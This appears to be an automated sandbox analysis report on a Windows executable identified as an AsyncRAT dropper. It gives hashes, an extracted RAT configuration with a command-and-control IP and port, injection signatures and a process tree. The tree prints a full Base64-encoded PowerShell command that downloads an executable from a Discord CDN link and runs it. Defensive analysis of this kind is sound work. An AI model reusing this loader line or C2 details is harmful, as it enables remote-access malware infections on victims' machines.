Analysis
-
max time kernel
142s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
17-12-2022 07:24
Static task
static1
Behavioral task
behavioral1
Sample
7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe
Resource
win10v2004-20220812-en
General
-
Target
7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe
-
Size
5KB
-
MD5
9f785803874e569c4309fb73dc109d37
-
SHA1
6942a4e79d651d6ff8fe9e4fafa6dc48fc5c9ced
-
SHA256
7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a
-
SHA512
b69e1189d80f39e29932e8ee07d5ecc37056a04cfb0549c2d61e8dbf1fbb32040412c0da0598ea4095700365aac3d201abaf5aa3c24c3c6d282389863ece00ec
-
SSDEEP
96:iC79tll3VI2vK8eu2tT+vk+zpCI80vK+/0s7DgGKed3ojgrl:iU9t/33v038vkM4I80vK+/0SAed/
Malware Config
Extracted
asyncrat
0.5.7B
System Guard Runtime
85.105.88.221:2531
System Guard Runtime
-
delay
3
-
install
false
-
install_file
System Guard Runtime
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2100-146-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 3472 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
asda1.exeasda1.exepid process 4908 asda1.exe 4572 asda1.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
asda1.exeasda1.exedescription pid process target process PID 4908 set thread context of 2100 4908 asda1.exe RegAsm.exe PID 4572 set thread context of 1472 4572 asda1.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3472 powershell.exe 3472 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeasda1.exeasda1.exedescription pid process Token: SeDebugPrivilege 3472 powershell.exe Token: SeDebugPrivilege 4908 asda1.exe Token: SeDebugPrivilege 4572 asda1.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exepowershell.exeasda1.exeasda1.exedescription pid process target process PID 3028 wrote to memory of 3472 3028 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe powershell.exe PID 3028 wrote to memory of 3472 3028 7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe powershell.exe PID 3472 wrote to memory of 4908 3472 powershell.exe asda1.exe PID 3472 wrote to memory of 4908 3472 powershell.exe asda1.exe PID 3472 wrote to memory of 4908 3472 powershell.exe asda1.exe PID 4908 wrote to memory of 2100 4908 asda1.exe RegAsm.exe PID 4908 wrote to memory of 2100 4908 asda1.exe RegAsm.exe PID 4908 wrote to memory of 2100 4908 asda1.exe RegAsm.exe PID 4908 wrote to memory of 2100 4908 asda1.exe RegAsm.exe PID 4908 wrote to memory of 2100 4908 asda1.exe RegAsm.exe PID 4908 wrote to memory of 2100 4908 asda1.exe RegAsm.exe PID 4908 wrote to memory of 2100 4908 asda1.exe RegAsm.exe PID 4908 wrote to memory of 2100 4908 asda1.exe RegAsm.exe PID 4572 wrote to memory of 1472 4572 asda1.exe RegAsm.exe PID 4572 wrote to memory of 1472 4572 asda1.exe RegAsm.exe PID 4572 wrote to memory of 1472 4572 asda1.exe RegAsm.exe PID 4572 wrote to memory of 1472 4572 asda1.exe RegAsm.exe PID 4572 wrote to memory of 1472 4572 asda1.exe RegAsm.exe PID 4572 wrote to memory of 1472 4572 asda1.exe RegAsm.exe PID 4572 wrote to memory of 1472 4572 asda1.exe RegAsm.exe PID 4572 wrote to memory of 1472 4572 asda1.exe RegAsm.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe"C:\Users\Admin\AppData\Local\Temp\7e2b561323379eb18ff180c88b7381edaaaf8b6047111a1b3e2a325dcebd123a.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAcAB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUAMgAxADUAMwA5ADUAMQAwADYANQAyADIANwAyADYANAAvADEAMAA1ADIAMQA1ADQANQAxADkAMgA1ADUAMAAwADcAMgAzADIALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGIAeQBnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgB1AHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdgBzAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBzAGQAYQAxAC4AZQB4AGUAJwApACkAPAAjAGgAYgBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGgAaQBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBmAG0AaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABhADEALgBlAHgAZQAnACkAPAAjAHcAbQBkACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\asda1.exe"C:\Users\Admin\AppData\Local\Temp\asda1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\asda1.exeC:\Users\Admin\AppData\Local\Temp\asda1.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\asda1.exe.logFilesize
902B
MD5317ed182314a105b8436cfd8bb3879f6
SHA1aa407b44619a9b06b18d8a39ce27a65b959598e1
SHA25634a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865
SHA51227bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604
-
C:\Users\Admin\AppData\Local\Temp\asda1.exeFilesize
14.7MB
MD52cbd5d9d43c5c49f0580975e9e620808
SHA117e209b6d6c66882ed78a40d7e0d211760b489a0
SHA256399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403
SHA51226e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812
-
C:\Users\Admin\AppData\Local\Temp\asda1.exeFilesize
14.7MB
MD52cbd5d9d43c5c49f0580975e9e620808
SHA117e209b6d6c66882ed78a40d7e0d211760b489a0
SHA256399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403
SHA51226e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812
-
C:\Users\Admin\AppData\Local\Temp\asda1.exeFilesize
14.7MB
MD52cbd5d9d43c5c49f0580975e9e620808
SHA117e209b6d6c66882ed78a40d7e0d211760b489a0
SHA256399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403
SHA51226e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812
-
memory/1472-149-0x0000000000000000-mapping.dmp
-
memory/2100-146-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2100-145-0x0000000000000000-mapping.dmp
-
memory/3028-135-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmpFilesize
10.8MB
-
memory/3028-132-0x0000000000010000-0x0000000000018000-memory.dmpFilesize
32KB
-
memory/3472-139-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmpFilesize
10.8MB
-
memory/3472-136-0x00007FF9F3B20000-0x00007FF9F45E1000-memory.dmpFilesize
10.8MB
-
memory/3472-134-0x000001AAE81A0000-0x000001AAE81C2000-memory.dmpFilesize
136KB
-
memory/3472-133-0x0000000000000000-mapping.dmp
-
memory/4908-141-0x0000000000CB0000-0x0000000001B60000-memory.dmpFilesize
14.7MB
-
memory/4908-142-0x0000000007040000-0x00000000075E4000-memory.dmpFilesize
5.6MB
-
memory/4908-143-0x0000000006C30000-0x0000000006CC2000-memory.dmpFilesize
584KB
-
memory/4908-144-0x0000000006D80000-0x0000000006E1C000-memory.dmpFilesize
624KB
-
memory/4908-137-0x0000000000000000-mapping.dmp